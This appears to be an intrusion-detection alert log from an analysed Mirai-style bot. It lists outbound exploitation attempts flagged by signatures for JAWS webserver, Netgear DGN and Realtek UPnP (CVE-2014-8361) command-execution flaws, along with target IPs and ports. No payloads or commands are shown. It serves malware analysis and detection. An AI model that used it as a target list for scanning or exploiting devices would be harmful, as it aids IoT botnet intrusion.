                                                                  2024-11-28T07:28:01.057863+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358364108.165.239.2518080TCP
                                                                  2024-11-28T07:28:01.309854+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338690177.200.207.5880TCP
                                                                  2024-11-28T07:28:01.309854+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338690177.200.207.5880TCP
                                                                  2024-11-28T07:28:01.461820+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357246119.215.99.1565555TCP
                                                                  2024-11-28T07:28:09.506579+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234842213.35.2.1608080TCP
                                                                  2024-11-28T07:28:09.507681+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235262452.116.215.21080TCP
                                                                  2024-11-28T07:28:09.508432+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233429897.91.236.20652869TCP
                                                                  2024-11-28T07:28:09.509504+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2344886101.189.50.3852869TCP
                                                                  2024-11-28T07:28:09.510326+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340018175.170.71.15549152TCP
                                                                  2024-11-28T07:28:09.510606+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344862214.89.56.22980TCP
                                                                  2024-11-28T07:28:09.511709+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235315854.104.73.1938080TCP
                                                                  2024-11-28T07:28:09.512442+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352432159.99.163.1117574TCP
                                                                  2024-11-28T07:28:09.513175+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233406664.173.83.1705555TCP
                                                                  2024-11-28T07:28:09.513546+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356088186.96.78.18649152TCP
                                                                  2024-11-28T07:28:09.514267+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359688166.249.145.1605555TCP
                                                                  2024-11-28T07:28:09.514641+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233760873.230.184.1952869TCP
                                                                  2024-11-28T07:28:09.515001+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233408675.89.77.20680TCP
                                                                  2024-11-28T07:28:09.515372+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350660114.117.212.449152TCP
                                                                  2024-11-28T07:28:09.515733+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348846114.17.69.1815555TCP
                                                                  2024-11-28T07:28:09.516467+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344670106.43.212.1378080TCP
                                                                  2024-11-28T07:28:09.516815+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235503035.184.146.11849152TCP
                                                                  2024-11-28T07:28:09.517185+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332980122.187.139.19080TCP
                                                                  2024-11-28T07:28:09.517185+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332980122.187.139.19080TCP
                                                                  2024-11-28T07:28:09.517564+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2349060121.95.76.25052869TCP
                                                                  2024-11-28T07:28:09.517913+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349366177.120.79.880TCP
                                                                  2024-11-28T07:28:09.517913+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349366177.120.79.880TCP
                                                                  2024-11-28T07:28:09.518651+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344448203.238.209.215555TCP
                                                                  2024-11-28T07:28:09.519020+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352900143.207.148.5449152TCP
                                                                  2024-11-28T07:28:09.519383+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233849631.195.52.6180TCP
                                                                  2024-11-28T07:28:09.519767+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234156492.194.65.278080TCP
                                                                  2024-11-28T07:28:09.520487+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338606105.13.161.14480TCP
                                                                  2024-11-28T07:28:09.521249+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352188117.244.40.13480TCP
                                                                  2024-11-28T07:28:09.521249+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352188117.244.40.13480TCP
                                                                  2024-11-28T07:28:09.521646+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348626107.201.204.12449152TCP
                                                                  2024-11-28T07:28:09.522015+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2340038201.195.59.21780TCP
                                                                  2024-11-28T07:28:09.522399+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358462170.20.179.2318080TCP
                                                                  2024-11-28T07:28:09.522780+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235573227.105.227.24980TCP
                                                                  2024-11-28T07:28:09.523891+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345596158.60.86.2187574TCP
                                                                  2024-11-28T07:28:09.524270+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343880191.213.172.777574TCP
                                                                  2024-11-28T07:28:09.525388+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233627679.128.124.15780TCP
                                                                  2024-11-28T07:28:09.525767+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2350332116.81.240.78080TCP
                                                                  2024-11-28T07:28:09.526156+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339428163.197.220.20349152TCP
                                                                  2024-11-28T07:28:09.526519+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234831238.198.165.697574TCP
                                                                  2024-11-28T07:28:09.526898+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236060828.115.34.20780TCP
                                                                  2024-11-28T07:28:09.528036+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234741228.196.179.238080TCP
                                                                  2024-11-28T07:28:09.528801+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234015499.216.95.1665555TCP
                                                                  2024-11-28T07:28:09.531008+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234678497.137.41.21180TCP
                                                                  2024-11-28T07:28:09.531008+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234678497.137.41.21180TCP
                                                                  2024-11-28T07:28:09.531385+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345114171.119.20.11849152TCP
                                                                  2024-11-28T07:28:09.531740+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235942436.64.74.20349152TCP
                                                                  2024-11-28T07:28:09.532122+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346996136.27.141.238080TCP
                                                                  2024-11-28T07:28:09.532518+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357430109.90.191.1758080TCP
                                                                  2024-11-28T07:28:09.532902+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.236075445.112.243.188080TCP
                                                                  2024-11-28T07:28:09.534036+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235702424.158.93.2358080TCP
                                                                  2024-11-28T07:28:09.534786+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346042193.206.30.2108080TCP
                                                                  2024-11-28T07:28:09.535554+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359610103.210.62.10380TCP
                                                                  2024-11-28T07:28:09.536317+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345072209.161.87.328080TCP
                                                                  2024-11-28T07:28:09.536696+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346998203.226.247.23580TCP
                                                                  2024-11-28T07:28:09.537078+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235021268.10.114.2480TCP
                                                                  2024-11-28T07:28:09.537833+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233741444.153.13.580TCP
                                                                  2024-11-28T07:28:09.538212+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236077615.182.172.185555TCP
                                                                  2024-11-28T07:28:09.538595+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234644455.164.19.17880TCP
                                                                  2024-11-28T07:28:09.538595+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234644455.164.19.17880TCP
                                                                  2024-11-28T07:28:09.539011+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349042142.0.210.2538080TCP
                                                                  2024-11-28T07:28:09.539729+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235476876.160.156.24280TCP
                                                                  2024-11-28T07:28:09.539729+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235476876.160.156.24280TCP
                                                                  2024-11-28T07:28:09.540491+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346302187.46.100.11180TCP
                                                                  2024-11-28T07:28:09.542791+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338284203.108.157.20349152TCP
                                                                  2024-11-28T07:28:09.543332+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235428497.116.126.1717574TCP
                                                                  2024-11-28T07:28:09.543576+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23450329.130.45.9680TCP
                                                                  2024-11-28T07:28:09.543964+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344394152.145.133.637574TCP
                                                                  2024-11-28T07:28:09.544384+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354816167.138.9.25180TCP
                                                                  2024-11-28T07:28:09.544689+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344554215.109.47.1608080TCP
                                                                  2024-11-28T07:28:09.545445+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235446440.134.41.14780TCP
                                                                  2024-11-28T07:28:09.545821+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235174840.57.210.16880TCP
                                                                  2024-11-28T07:28:09.546572+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350630205.138.223.895555TCP
                                                                  2024-11-28T07:28:09.547321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349770178.81.166.1995555TCP
                                                                  2024-11-28T07:28:09.547928+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23536189.27.194.1498080TCP
                                                                  2024-11-28T07:28:09.548458+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337136197.96.116.13580TCP
                                                                  2024-11-28T07:28:09.548802+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23468987.22.161.3780TCP
                                                                  2024-11-28T07:28:09.549170+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233739460.38.64.1618080TCP
                                                                  2024-11-28T07:28:09.549912+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345848131.57.28.1818080TCP
                                                                  2024-11-28T07:28:09.550269+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235886095.213.81.2180TCP
                                                                  2024-11-28T07:28:09.550269+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235886095.213.81.2180TCP
                                                                  2024-11-28T07:28:09.551360+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344056221.66.59.1357574TCP
                                                                  2024-11-28T07:28:09.553545+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341324142.172.142.8749152TCP
                                                                  2024-11-28T07:28:09.553910+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2354778171.79.99.18080TCP
                                                                  2024-11-28T07:28:09.554334+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234522211.190.108.11780TCP
                                                                  2024-11-28T07:28:09.554696+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338934140.221.39.24280TCP
                                                                  2024-11-28T07:28:09.555814+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333862113.94.133.1707574TCP
                                                                  2024-11-28T07:28:09.556589+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234265626.11.196.705555TCP
                                                                  2024-11-28T07:28:09.556969+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235338658.189.121.16952869TCP
                                                                  2024-11-28T07:28:09.557706+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233729035.200.178.135555TCP
                                                                  2024-11-28T07:28:09.558835+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344434155.189.226.12580TCP
                                                                  2024-11-28T07:28:09.559213+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235315232.54.226.307574TCP
                                                                  2024-11-28T07:28:09.559992+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23466447.29.11.1325555TCP
                                                                  2024-11-28T07:28:09.561071+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235678655.77.110.1377574TCP
                                                                  2024-11-28T07:28:09.561447+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233426230.84.48.13080TCP
                                                                  2024-11-28T07:28:09.561814+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349462171.23.177.24049152TCP
                                                                  2024-11-28T07:28:09.562622+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234246096.204.93.2465555TCP
                                                                  2024-11-28T07:28:09.562937+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23341586.205.85.15849152TCP
                                                                  2024-11-28T07:28:09.563305+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355714122.248.149.16580TCP
                                                                  2024-11-28T07:28:09.563305+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355714122.248.149.16580TCP
                                                                  2024-11-28T07:28:09.563673+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333160192.97.26.23680TCP
                                                                  2024-11-28T07:28:09.563673+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333160192.97.26.23680TCP
                                                                  2024-11-28T07:28:09.564781+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233459225.75.205.1735555TCP
                                                                  2024-11-28T07:28:09.565198+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2348832106.222.158.552869TCP
                                                                  2024-11-28T07:28:09.566688+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345012137.62.189.19380TCP
                                                                  2024-11-28T07:28:09.566819+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356816107.227.55.14480TCP
                                                                  2024-11-28T07:28:09.566819+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356816107.227.55.14480TCP
                                                                  2024-11-28T07:28:09.567069+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341512209.219.134.77574TCP
                                                                  2024-11-28T07:28:09.567443+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349896126.106.74.1568080TCP
                                                                  2024-11-28T07:28:09.567821+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234881059.230.90.1605555TCP
                                                                  2024-11-28T07:28:09.568190+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350024179.251.32.25180TCP
                                                                  2024-11-28T07:28:09.568190+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350024179.251.32.25180TCP
                                                                  2024-11-28T07:28:09.568935+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360514158.166.4.16580TCP
                                                                  2024-11-28T07:28:09.568935+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235308868.228.150.778080TCP
                                                                  2024-11-28T07:28:09.568935+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360514158.166.4.16580TCP
                                                                  2024-11-28T07:28:09.569310+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234926255.92.215.8380TCP
                                                                  2024-11-28T07:28:09.570433+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354916167.15.35.2467574TCP
                                                                  2024-11-28T07:28:09.570809+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352194134.224.138.247574TCP
                                                                  2024-11-28T07:28:09.571330+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234073631.23.54.2087574TCP
                                                                  2024-11-28T07:28:09.571564+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354474170.93.179.1787574TCP
                                                                  2024-11-28T07:28:09.571928+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339080196.155.214.595555TCP
                                                                  2024-11-28T07:28:09.572301+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233787646.35.54.918080TCP
                                                                  2024-11-28T07:28:09.573168+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343916105.45.143.15580TCP
                                                                  2024-11-28T07:28:09.573975+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2356834152.0.87.20052869TCP
                                                                  2024-11-28T07:28:09.574185+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234933475.31.109.1267574TCP
                                                                  2024-11-28T07:28:09.574563+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351128170.251.163.525555TCP
                                                                  2024-11-28T07:28:09.574945+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336546217.237.6.18880TCP
                                                                  2024-11-28T07:28:09.575321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23357649.31.4.1418080TCP
                                                                  2024-11-28T07:28:09.575683+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2347196100.49.226.16252869TCP
                                                                  2024-11-28T07:28:09.576047+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341996161.154.233.9080TCP
                                                                  2024-11-28T07:28:09.576047+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341996161.154.233.9080TCP
                                                                  2024-11-28T07:28:09.576795+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.236049868.101.86.22752869TCP
                                                                  2024-11-28T07:28:09.577889+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2334698124.127.132.5752869TCP
                                                                  2024-11-28T07:28:09.578350+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23472663.111.24.13352869TCP
                                                                  2024-11-28T07:28:09.579008+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354360220.234.56.3049152TCP
                                                                  2024-11-28T07:28:09.579037+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353006180.158.189.19080TCP
                                                                  2024-11-28T07:28:09.579841+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336598152.206.32.1378080TCP
                                                                  2024-11-28T07:28:09.580120+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2360268128.39.179.20052869TCP
                                                                  2024-11-28T07:28:09.580475+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234938294.141.19.2228080TCP
                                                                  2024-11-28T07:28:09.583055+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2350614215.230.56.17552869TCP
                                                                  2024-11-28T07:28:09.583788+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350966202.214.164.7749152TCP
                                                                  2024-11-28T07:28:09.584518+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233452668.169.46.18852869TCP
                                                                  2024-11-28T07:28:09.584890+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344616222.239.189.685555TCP
                                                                  2024-11-28T07:28:09.585256+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233629624.168.141.21052869TCP
                                                                  2024-11-28T07:28:09.585617+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235640245.49.121.2377574TCP
                                                                  2024-11-28T07:28:09.585985+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349388157.116.73.77574TCP
                                                                  2024-11-28T07:28:09.586352+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234627660.61.74.4752869TCP
                                                                  2024-11-28T07:28:09.586715+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338626137.6.145.875555TCP
                                                                  2024-11-28T07:28:09.587816+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234398685.206.232.11852869TCP
                                                                  2024-11-28T07:28:09.588914+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235197628.36.92.24280TCP
                                                                  2024-11-28T07:28:09.588946+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2338618126.210.97.15052869TCP
                                                                  2024-11-28T07:28:09.588947+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235979445.90.89.277574TCP
                                                                  2024-11-28T07:28:09.589279+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2334374212.60.199.1138080TCP
                                                                  2024-11-28T07:28:09.589648+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359874108.136.248.7980TCP
                                                                  2024-11-28T07:28:09.590266+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357590118.79.188.6780TCP
                                                                  2024-11-28T07:28:09.590266+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357590118.79.188.6780TCP
                                                                  2024-11-28T07:28:09.590387+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233417815.238.152.12780TCP
                                                                  2024-11-28T07:28:09.591110+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235529499.219.59.20349152TCP
                                                                  2024-11-28T07:28:09.591336+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354792114.177.103.1507574TCP
                                                                  2024-11-28T07:28:09.591481+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23490309.179.110.1118080TCP
                                                                  2024-11-28T07:28:09.591845+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233447289.109.61.1418080TCP
                                                                  2024-11-28T07:28:09.592209+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360714207.79.150.2345555TCP
                                                                  2024-11-28T07:28:09.592955+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233612214.204.207.2378080TCP
                                                                  2024-11-28T07:28:09.594395+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352560153.118.180.18149152TCP
                                                                  2024-11-28T07:28:09.594765+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344238197.179.152.1987574TCP
                                                                  2024-11-28T07:28:09.595857+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340020173.220.217.1995555TCP
                                                                  2024-11-28T07:28:09.596002+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348870129.46.212.8480TCP
                                                                  2024-11-28T07:28:09.596002+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348870129.46.212.8480TCP
                                                                  2024-11-28T07:28:09.597681+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233319225.76.24.638080TCP
                                                                  2024-11-28T07:28:09.598043+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2355006163.122.132.1878080TCP
                                                                  2024-11-28T07:28:09.599186+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2333618177.71.61.1618080TCP
                                                                  2024-11-28T07:28:09.599553+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234432254.197.126.11649152TCP
                                                                  2024-11-28T07:28:09.600971+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352506170.254.161.2649152TCP
                                                                  2024-11-28T07:28:09.601332+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2340352221.124.199.7480TCP
                                                                  2024-11-28T07:28:09.601694+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2335628178.233.21.10552869TCP
                                                                  2024-11-28T07:28:09.602149+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348112108.29.185.407574TCP
                                                                  2024-11-28T07:28:09.602803+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342750114.220.234.177574TCP
                                                                  2024-11-28T07:28:09.603205+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23361163.195.8.907574TCP
                                                                  2024-11-28T07:28:09.603560+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234436619.106.226.18880TCP
                                                                  2024-11-28T07:28:09.603928+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346988157.96.102.1780TCP
                                                                  2024-11-28T07:28:09.603928+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346988157.96.102.1780TCP
                                                                  2024-11-28T07:28:09.605387+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2357050146.110.86.8580TCP
                                                                  2024-11-28T07:28:09.605760+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235095058.130.138.13180TCP
                                                                  2024-11-28T07:28:09.606481+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351822120.121.182.1558080TCP
                                                                  2024-11-28T07:28:09.607698+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346204153.97.17.1958080TCP
                                                                  2024-11-28T07:28:09.608090+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348570123.86.59.1449152TCP
                                                                  2024-11-28T07:28:09.608435+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344542142.253.75.1580TCP
                                                                  2024-11-28T07:28:09.609169+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234015874.42.253.22149152TCP
                                                                  2024-11-28T07:28:09.610296+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2343418132.20.246.25352869TCP
